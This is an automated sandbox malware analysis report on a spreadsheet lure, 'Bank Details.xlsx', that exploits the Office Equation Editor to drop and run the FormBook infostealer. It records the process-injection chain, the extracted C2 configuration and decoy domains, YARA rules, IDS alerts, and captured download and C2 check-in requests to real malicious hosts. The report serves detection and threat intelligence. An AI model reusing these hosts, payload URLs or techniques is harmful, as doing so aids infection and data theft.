Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Bank Details.xlsx

Overview

General Information

Sample Name:Bank Details.xlsx
Analysis ID:385368
MD5:c8aa551fd4cc3b5d6e87ea3f025fa6f2
SHA1:3285390c80ccb179471f31cb4552db8802de518c
SHA256:d22df2dfcfccf5964421ffbbceee8193dc4b6cb6663ea2a3c9687ca57d6779a5
Tags:HostgatorVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Drops PE files to the user root directory
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops certificate files (DER)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2316 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2592 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2968 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2C64897AA30694CC768F5EA375157932)
      • vbc.exe (PID: 2924 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2C64897AA30694CC768F5EA375157932)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • help.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\help.exe MD5: 0F488C73AA50C2FC1361F19E8FC19926)
            • cmd.exe (PID: 1836 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.vbc.exe.2e30000.15.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.vbc.exe.2e30000.15.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.vbc.exe.2e30000.15.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.141.138.117, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2592, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeMetadefender: Detection: 13%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeReversingLabs: Detection: 75%
          Source: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dllMetadefender: Detection: 18%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dllReversingLabs: Detection: 37%
          Source: C:\Users\Public\vbc.exeMetadefender: Detection: 13%Perma Link
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 75%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.help.exe.1027960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 4.2.vbc.exe.2e30000.15.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.help.exe.44c4c0.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: unknownHTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49167 version: TLS 1.2
          Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
          Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2218410009.0000000000579000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004026BC FindFirstFileA,
          Source: excel.exeMemory has grown: Private usage: 4MB later: 77MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi
          Source: global trafficDNS query: name: fqe.short.gy
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 52.59.165.42:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 52.59.165.42:443

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 3.230.51.235:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 3.230.51.235:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 3.230.51.235:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.stone-master.info/aqu2/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 09:38:07 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Wed, 07 Apr 2021 13:42:46 GMTETag: "324f1-5bf621b210103"Accept-Ranges: bytesContent-Length: 206065Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 6c 4a a8 a1 0d 24 fb a1 0d 24 fb a1 0d 24 fb 2f 05 7b fb a3 0d 24 fb a1 0d 25 fb 39 0d 24 fb 22 05 79 fb b0 0d 24 fb f5 2e 14 fb a8 0d 24 fb 66 0b 22 fb a0 0d 24 fb 52 69 63 68 a1 0d 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1d cd 38 45 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 86 02 00 00 04 00 00 66 31 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 74 00 00 b4 00 00 00 00 80 03 00 67 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fe 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fe 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d4 64 02 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 67 05 00 00 00 80 03 00 00 06 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=K5Kf6zcgTMboCFmhMfN1gGfLaJuyFjl9HZYEWhqsekuFhK5NTINkzxSmehZhuXmdAQL3VA==&Yzrt=nN6d4T HTTP/1.1Host: www.playfulpainters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=s46ojqJle3Soul44eo8rnM8O95xci96QFJKF/CkhZ8StqcbPmW9gr+kDew9qIR65/st6pQ==&Yzrt=nN6d4T HTTP/1.1Host: www.hostvngiare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=s0A+R2zuZA1+LPHAc9M/AmUzyN8aP2GBLv9J4fG53S1jdbvs3uSd9usyNyOEpwpEqUbLdg==&Yzrt=nN6d4T HTTP/1.1Host: www.thesixteenthround.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=toEAtfX1LDSonbWoA+2t7dOdvm85giv91wk/sm/PalfrX1ye/8l3cmSiDehl2Pz5Hv2v/g==&Yzrt=nN6d4T HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=n0kajkVKrFhs8OXGdIr62gA+iBln1jDamJdU2gSjeygeLyUnpUxBQzZrsA56E2MZ1cixJw==&Yzrt=nN6d4T HTTP/1.1Host: www.christlicheliebe.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=mL9TVQaOR/c/9ivG5fkw1nXZWj4Nbf+dNa5NuWBK0bSYoDjNDzx/n8mD4eDtsAuI9QTUuQ==&Yzrt=nN6d4T HTTP/1.1Host: www.18598853855.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T HTTP/1.1Host: www.starr2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.59.165.42 52.59.165.42
          Source: Joe Sandbox ViewIP Address: 103.141.138.117 103.141.138.117
          Source: Joe Sandbox ViewIP Address: 198.54.117.212 198.54.117.212
          Source: Joe Sandbox ViewASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /documepnt/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdypmrimelimtewsosq.dns.army
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C8CCA5F.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /documepnt/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdypmrimelimtewsosq.dns.army
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=K5Kf6zcgTMboCFmhMfN1gGfLaJuyFjl9HZYEWhqsekuFhK5NTINkzxSmehZhuXmdAQL3VA==&Yzrt=nN6d4T HTTP/1.1Host: www.playfulpainters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=s46ojqJle3Soul44eo8rnM8O95xci96QFJKF/CkhZ8StqcbPmW9gr+kDew9qIR65/st6pQ==&Yzrt=nN6d4T HTTP/1.1Host: www.hostvngiare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=s0A+R2zuZA1+LPHAc9M/AmUzyN8aP2GBLv9J4fG53S1jdbvs3uSd9usyNyOEpwpEqUbLdg==&Yzrt=nN6d4T HTTP/1.1Host: www.thesixteenthround.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=toEAtfX1LDSonbWoA+2t7dOdvm85giv91wk/sm/PalfrX1ye/8l3cmSiDehl2Pz5Hv2v/g==&Yzrt=nN6d4T HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=n0kajkVKrFhs8OXGdIr62gA+iBln1jDamJdU2gSjeygeLyUnpUxBQzZrsA56E2MZ1cixJw==&Yzrt=nN6d4T HTTP/1.1Host: www.christlicheliebe.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=mL9TVQaOR/c/9ivG5fkw1nXZWj4Nbf+dNa5NuWBK0bSYoDjNDzx/n8mD4eDtsAuI9QTUuQ==&Yzrt=nN6d4T HTTP/1.1Host: www.18598853855.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T HTTP/1.1Host: www.starr2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
